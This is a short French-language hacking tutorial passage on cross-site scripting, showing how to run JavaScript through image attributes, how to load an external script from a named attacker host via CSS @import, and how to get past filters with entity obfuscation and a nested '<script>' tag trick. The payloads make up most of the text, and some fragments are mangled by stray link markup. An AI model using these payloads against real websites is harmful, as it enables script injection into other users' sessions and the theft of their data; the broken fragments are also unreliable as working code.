Divers (IMG - JS - CSS)
Nous avons vus dans l'exploitation Webmail comment faire exécuter du Javascript à partir d'une image :
<img src="javascript:..."><img dynsrc="javascript:...">
<img lowsrc="javascript:...">
Mais cela est aussi possible via les feuilles de style (CSS). Ce qui permet par exemple de faire appeller des scripts JS externes :
<style type="text/css">
@import url(<a href="http://www.hackeur.net/tmor.js");
</style>
Mais on peut également ajouter du code directement :
<style type="text/css">
@import url(<a href="http://www.hackeur.net/tmor.js">javascript:...);
</style>
Pour ce qui est de l'importation de JS via les images, il est également possible de s'en servir dans un autre contexte que pour Webmail, mais dans ce cas, quelques sécurités (ou plutôt filtres) doivent être évités.
Les entités HTML peuvent être remplacées par leurs équivalents ou au format exadécimal. Cette ligne correspond à une image exécutant du JS dans son SRC :
<img src="javAsc
ript:...">
Certains filtres suppriment toute présence de la chaine de caractère "<script>" (& "script") avant d'afficher le code. Ce qui est un bon moyen vus qu'un code dépouillé de cette balise ne sera plus interprété comme tel. Il existe cependant une solution trés simple :
<sc<script>ript language="javas<script>cript1.1">
Aprés application du filtre, voici ce qui est obtenu :
<script language="javascript1.1">